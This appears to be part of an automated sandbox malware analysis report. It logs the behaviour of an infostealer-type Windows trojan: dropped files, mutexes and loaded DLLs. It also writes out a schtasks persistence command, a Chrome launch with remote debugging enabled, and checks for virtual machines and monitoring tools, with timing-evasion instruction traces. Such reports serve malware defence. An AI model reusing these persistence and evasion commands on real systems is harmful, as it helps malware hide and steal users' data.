Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22140E 7_2_6C22140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C231510 7_2_6C231510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22F610 7_2_6C22F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C20F760 7_2_6C20F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1E3000 7_2_6C1E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F70C0 7_2_6C1F70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2A50D0 7_2_6C2A50D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C2AADB0 appears 49 times
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1756
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: vbnvzqtd ZLIB complexity 0.99427766716952
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6668
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000003.00000002.2406160796.0000285400714000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000003.00000002.2406603239.000028540074C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2276,i,7761635936261596126,5114517660047510357,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1756
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2276,i,7761635936261596126,5114517660047510357,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: file.exe Static file information: File size 4425728 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of vbnvzqtd is bigger than: 0x100000 < 0x1bd600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B38230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00B38230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x43c911 should be: 0x442b38
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: vbnvzqtd
Source: file.exe Static PE information: section name: ugjoxxza
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B3A521 push es; iretd 7_2_00B3A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C290C30 push eax; mov dword ptr [esp], edi 7_2_6C290DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C25ED10 push eax; mov dword ptr [esp], ebx 7_2_6C25EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C234E31 push eax; mov dword ptr [esp], ebx 7_2_6C234E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C228E7A push edx; mov dword ptr [esp], ebx 7_2_6C228E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A947 push eax; mov dword ptr [esp], ebx 7_2_6C22A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230AA2 push eax; mov dword ptr [esp], ebx 7_2_6C230AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C248AA0 push eax; mov dword ptr [esp], ebx 7_2_6C24909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C232AAC push edx; mov dword ptr [esp], ebx 7_2_6C232AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C25EAB0 push eax; mov dword ptr [esp], ebx 7_2_6C25EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262BF0 push eax; mov dword ptr [esp], ebx 7_2_6C262F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262BF0 push edx; mov dword ptr [esp], ebx 7_2_6C262F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C228435 push edx; mov dword ptr [esp], ebx 7_2_6C228449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C248460 push eax; mov dword ptr [esp], ebx 7_2_6C248A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22048B push eax; mov dword ptr [esp], ebx 7_2_6C2204A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2204E0 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C201CFA push eax; mov dword ptr [esp], ebx 7_2_6C2B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A5A7 push eax; mov dword ptr [esp], ebx 7_2_6C22A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262620 push eax; mov dword ptr [esp], ebx 7_2_6C262954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C262620 push edx; mov dword ptr [esp], ebx 7_2_6C262973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206A2 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2386A1 push 890005EAh; ret 7_2_6C2386A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206A6 push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2706B0 push eax; mov dword ptr [esp], ebx 7_2_6C270A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2266F3 push edx; mov dword ptr [esp], ebx 7_2_6C226707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2206FD push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22070E push eax; mov dword ptr [esp], ebx 7_2_6C2206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22A777 push eax; mov dword ptr [esp], ebx 7_2_6C22A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230042 push eax; mov dword ptr [esp], ebx 7_2_6C230056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1FE0D0 push eax; mov dword ptr [esp], ebx 7_2_6C2B6AF6
Source: file.exe Static PE information: section name: vbnvzqtd entropy: 7.9551999581431305
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127D01D second address: 127D028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F1F80D77646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAE36 second address: 12AAE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F81013DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AAE40 second address: 12AAE61 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F80D77658h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA454 second address: 12AA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA45A second address: 12AA468 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA468 second address: 12AA46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA46E second address: 12AA472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA5EE second address: 12AA600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F81013DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA600 second address: 12AA604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA604 second address: 12AA616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F1F81013DA6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA616 second address: 12AA622 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1F80D7764Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AA783 second address: 12AA787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE602 second address: 12AE60F instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F80D77646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE6CD second address: 12AE6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AE6D3 second address: 12AE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1F80D7764Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEB4C second address: 12AEB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEC3D second address: 12AEC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jo 00007F1F80D77646h 0x00000014 popad 0x00000015 je 00007F1F80D7764Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF090 second address: 12AF096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF096 second address: 12AF09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF09C second address: 12AF0AF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F81013DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF0AF second address: 12AF0B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF6D9 second address: 12AF6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF6DD second address: 12AF74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1F80D77658h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1F80D77648h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F1F80D77648h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov edi, 5F596691h 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D2008h], edx 0x00000050 xchg eax, ebx 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pop esi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF74E second address: 12AF760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jns 00007F1F81013DA6h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AF760 second address: 12AF765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B00CF second address: 12B00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1F81013DABh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B00EA second address: 12B00EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B0819 second address: 12B081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B1803 second address: 12B1807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B081E second address: 12B0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B23A2 second address: 12B23B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77652h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B5BD5 second address: 12B5BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BB584 second address: 12BB588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BB588 second address: 12BB5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F81013DB2h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BBB31 second address: 12BBB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF401 second address: 12BF405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02B1 second address: 12C02B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BF517 second address: 12BF549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1F81013DB7h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F81013DB0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C02B5 second address: 12C02D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F1F80D77646h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
